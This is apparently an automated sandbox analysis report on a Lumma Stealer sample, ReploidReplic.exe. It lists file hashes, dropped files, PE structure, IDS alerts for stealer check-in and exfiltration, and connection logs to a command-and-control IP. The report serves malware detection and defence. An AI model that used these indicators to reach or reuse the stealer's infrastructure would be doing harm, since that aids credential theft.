                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUShttps://compliance-central.com/route/ed5305641af2fd214861ba268e4a42aa2938b075/Get hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.96.1
                                                                                  GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.96.1
                                                                                  AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.16.1
                                                                                  web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.154.95
                                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.208.58
                                                                                  SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                  • 104.21.64.143
                                                                                  Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.48.1
                                                                                  GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.48.1
                                                                                  AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.48.1
                                                                                  hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                  • 104.21.48.1
                                                                                  web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.48.1
                                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.48.1
                                                                                  SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                  • 104.21.48.1
                                                                                  Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.48.1
                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.48.1
                                                                                  #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.48.1
                                                                                  No context
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):0.990187336488767
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:GHP0MKBHIOVykd0BU/mMMaupezuiFvZ24IO85W:GMMqHIOVLeBU/mMMa5zuiFvY4IO85W
                                                                                  MD5:F8B23F55CF2144F235C2410F3FF88EA0
                                                                                  SHA1:15263EDFD702B5D00AD6D2D535FABF046B6C6ED0
                                                                                  SHA-256:BD2AF3EACE3F5D4339DED2B12C4D62BAB4DCDDA647E5821C3CF590DCA38CF6FE
                                                                                  SHA-512:0AF19BCD6B878A7DAD2E8B802CBDD6DD4E325886EBDAD7B3A44C89F95E5D99C6B89261938CD03995280B02B7A875978637341A65D68E005149FD4A85E6068BEF
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.6.2.9.4.3.7.5.9.3.3.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.6.2.9.4.4.9.4.6.8.3.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.2.b.5.7.7.a.-.f.6.9.b.-.4.2.c.8.-.a.0.2.6.-.9.1.3.c.b.9.2.2.0.5.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.2.5.6.d.9.5.-.1.c.e.9.-.4.9.8.e.-.b.5.6.7.-.1.5.1.8.6.a.a.8.f.a.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.p.l.o.i.d.R.e.p.l.i.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.N.a.t.h.a.n.Z.a.c.h.a.r.y.E.l.e.a.n.o.r...p.d.f.n.N.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.0.8.-.0.0.0.1.-.0.0.1.4.-.a.5.4.3.-.a.c.a.b.f.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.2.2.0.9.8.6.f.c.3.b.4.d.5.8.f.c.c.0.7.a.f.2.d.8.4.8.d.c.0.8.0.0.0.0.0.0.0.0.!.0.0.0.0.1.2.e.d.1.9.5.0.a.d.0.8.b.2.e.0.d.e.a.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 20:09:04 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):195696
                                                                                  Entropy (8bit):3.374631036362303
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:yreR6sJad+6pN4uE2aOfYMIBSYaLTgK/36PJU/CDLu++3f:yq6sJw4uEq5oSLTgK/cJxi+
                                                                                  MD5:60A9627684DB4F562E690C29714BA005
                                                                                  SHA1:B1E7746ACCD7558B73B82A27EB7172C74BB46D52
                                                                                  SHA-256:8399471068E4846645DAE930E0EE5841221AD427B6EBA3225F1F3C51BD08417F
                                                                                  SHA-512:BA40ED0BE54AEFE9544FCF9581C879B8C8451BE4BC3A92AE5D99AE2AEE3F03CBC086E147970EA5E80C2A43D95F9F9AB73379E9E56971144712A2DF7F151C12B3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:MDMP..a..... .........rg............D...............X.......$................J..........`.......8...........T...........00..@...........,............ ..............................................................................eJ....... ......GenuineIntel............T.............rg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8428
                                                                                  Entropy (8bit):3.703924410460897
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:R6l7wVeJRVw6y6Y9ISU9XhgmfZyzY3pr089bxosf2dbm:R6lXJRi6y6YCSU9Xhgmf8zY7xbfX
                                                                                  MD5:95D107CFB14A88E9DC5143F1D9058E87
                                                                                  SHA1:44D63763A5742431628B0D0BA04B93EC04695FD3
                                                                                  SHA-256:0196DF0F4DD5B16E22F5616305F811C6C9A02035D3448DDD08322D9CD7CF8821
                                                                                  SHA-512:97E98A4ABD6F2F56A089888B0F953FFDC8D964714734D855F49DA2DB070901BA0FF5D16535DD71C625D8C94D14A50259AB7BFB8EEDCBB792EA76EC73BD4B0B4E
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.3.1.2.<./.P.i.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4798
                                                                                  Entropy (8bit):4.516063597432678
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zsjJg77aI9jQWpW8VYVYm8M4JD2Fio+q8vjOOIRbFoQd:uIjf9I7xp7V1JiKKOIRbFrd
                                                                                  MD5:0BFF5CEA3932BB7084D34FC94924EA30
                                                                                  SHA1:465CC9F024AEDDC28AA648DA1388EBA263A7EDDF
                                                                                  SHA-256:93FAA7CEDE3D7CFC455AE8D91682BCBAB3CD5D742BA5D39581A6983B280713A4
                                                                                  SHA-512:1E92623F688246C5E9BFDFEF472A5F317063201D8B1060B0E990982141D71EC31D9B9286731444C345C65A436A7DD5B47D4764E2ACB9445E0429DF7E65854989
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="654431" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                  Process:C:\Users\user\Desktop\ReploidReplic.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):443392
                                                                                  Entropy (8bit):7.118876394028855
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:3eJ30tMJPD6jnDrAZBvpdqrzOpLidgvFUAuvm2GL7hCmg9y4P+KjxV3Qf2dcLLK7:QjGMZBvb0tuwmg91tFV3QycaA5W
                                                                                  MD5:1C162E86473AE4C3182F575E264BFA6B
                                                                                  SHA1:B2841B93A1302BD9F67851D9FB7629CF536235A1
                                                                                  SHA-256:E66F19D801426502114BD3DA645779B9C2D3ACC06B83B4DE5BCF0EC24E4C5F6C
                                                                                  SHA-512:6A6770D9A812BDB94BE853DA0E890B28ED6EB213E60FEE2A9043D3C09346CF1E4BF92C1E0F0ECD69AAAB5E61CB849E50D266AEAEF2CC12C6F3B7266C0583042A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L...G.rg...........!.........>............................................................@.............................|.......P...............................\...\...............................x...@...............T............................text.............................. ..`.rdata...\.......^..................@..@.data...............................@....reloc..\...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):1835008
                                                                                  Entropy (8bit):4.46562754094802
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:eIXfpi67eLPU9skLmb0b4rWSPKaJG8nAgejZMMhA2gX4WABl0uN+dwBCswSbN:zXD94rWlLZMM6YFH0+N
                                                                                  MD5:C8F5651D2B1AA6413FDCA571ADA0250C
                                                                                  SHA1:BFBF9FBA097723F4A96D991BC9103725C62273FA
                                                                                  SHA-256:83CCF1EDB2AEB9693530443F6515C9788BD6139A9288F549AD24B3EB03973A0D
                                                                                  SHA-512:61AB21C9B2C3D4EBF61BB4F567159B28B64ED8D03A490320B5AE125BBD7DD88F2607AEEBB587B261A5949AF7DA08BDEB78A00612EBBF353F2934CDA0904C5003
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..H..Z...............................................................................................................................................................................................................................................................................................................................................'_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\ReploidReplic.exe
                                                                                  File Type:ASCII text, with very long lines (356), with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1417
                                                                                  Entropy (8bit):4.53722422649829
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:7v74Nu9MvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4QMff2p8p14nrPKktp
                                                                                  MD5:3F451A96E216677C093DEF4317DE8866
                                                                                  SHA1:5FDE729742B45D2A0716CE18CB3AE7292D5E715C
                                                                                  SHA-256:3868A98EDE9688BC165C07A35BA3EB45F35B232FB697AFD6885B2A5E5B6CBF50
                                                                                  SHA-512:C9246A5DEB5420F1CF144F6AA178353BCBA3E35EBE3D3B36486360AEB0496D909FDF79C1304065F9CC260347DA78D14241C8F82390343A6D531F22842C73340D
                                                                                  Malicious:false
                                                                                  Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "NathanZacharyEleanor" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.Get
                                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.738857694972729
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:ReploidReplic.exe
                                                                                  File size:707'584 bytes
                                                                                  MD5:7db52dda50a584c20d69a00d2b13c63d
                                                                                  SHA1:12ed1950ad08b2e0dea8442d95b33e03de68ca8d
                                                                                  SHA256:0b571a24307780dc181fd657ee4a9d4fca6a4b2076636d793d906944e3a71e2e
                                                                                  SHA512:e756eeaecb12ecc5b8603fde6bc30855c860fb4494ff021bf6fbbd51c4012835841682a8af7beea513193e5eab177b79f651d7f891ae8bb71c79a04a4f583f32
                                                                                  SSDEEP:12288:CusYxZidn8TRgizG9KB7xZ/fTE2CRXR9Fr8uniH67hWi37sypczUPEj/lgxpR+JU:CusY7Y8TRPSKBjTE2CRXjFAbHoYs7
                                                                                  TLSH:67E47C9C726072DFC867C472DEA81CA8EA91787B971F4217A02716ED9A0D897CF150F3
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.rg..............0..............@....... ....@.. .......................`............@................................
                                                                                  Icon Hash:90cececece8e8eb0
                                                                                  Entrypoint:0x4b400a
                                                                                  Entrypoint Section:
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows cui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x67729049 [Mon Dec 30 12:21:29 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [004B4000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8e7500x4b.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x630.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xb40000x8
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x8e0000x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  KzTnD~C0x20000x8afb00x8b00099fe1db8d696714b47b4398936467576False1.0003179097347121data7.999695257845116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .text0x8e0000x20b000x20c00a8d14fddf30daa9edd56736a365973dcFalse0.3307490458015267data4.68516812637425IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xb00000x6300x8003c506b2847f54dedf8f5cdf3b118e4b5False0.3515625data3.480657194041579IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0xb20000xc0x20049ba7a9e1e9d0fde8dd025f5fdb99dfeFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  0xb40000x100x2004127b9171e3003f39da93ea6e151a6f0False0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_VERSION0xb00a00x3a4data0.4409871244635193
                                                                                  RT_MANIFEST0xb04440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-30T21:09:05.263405+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.48.1443TCP
                                                                                  2024-12-30T21:09:05.918183+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.48.1443TCP
                                                                                  2024-12-30T21:09:05.918183+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.48.1443TCP
                                                                                  2024-12-30T21:09:06.446062+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.48.1443TCP
                                                                                  2024-12-30T21:09:06.943164+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.48.1443TCP
                                                                                  2024-12-30T21:09:06.943164+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.48.1443TCP
                                                                                  2024-12-30T21:09:07.725901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.48.1443TCP
                                                                                  2024-12-30T21:09:10.474876+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.48.1443TCP
                                                                                  2024-12-30T21:09:11.745125+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.48.1443TCP
                                                                                  2024-12-30T21:09:13.309211+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.48.1443TCP
                                                                                  2024-12-30T21:09:13.619577+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449742104.21.48.1443TCP
                                                                                  2024-12-30T21:09:14.157571+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.48.1443TCP
                                                                                  2024-12-30T21:09:15.787491+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.48.1443TCP
                                                                                  2024-12-30T21:09:16.303469+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746104.21.48.1443TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 30, 2024 21:09:04.762763023 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:04.762801886 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:04.762867928 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:04.767226934 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:04.767241955 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.263309002 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.263405085 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.277239084 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.277255058 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.278177977 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.330378056 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.501171112 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.501204967 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.501527071 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.918277025 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.918529987 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.918610096 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.921176910 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.921192884 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.921209097 CET49730443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.921214104 CET44349730104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.967161894 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.967204094 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:05.967286110 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.967565060 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:05.967588902 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.445971012 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.446062088 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.459585905 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.459614038 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.460407019 CET44349731104.21.48.1192.168.2.4
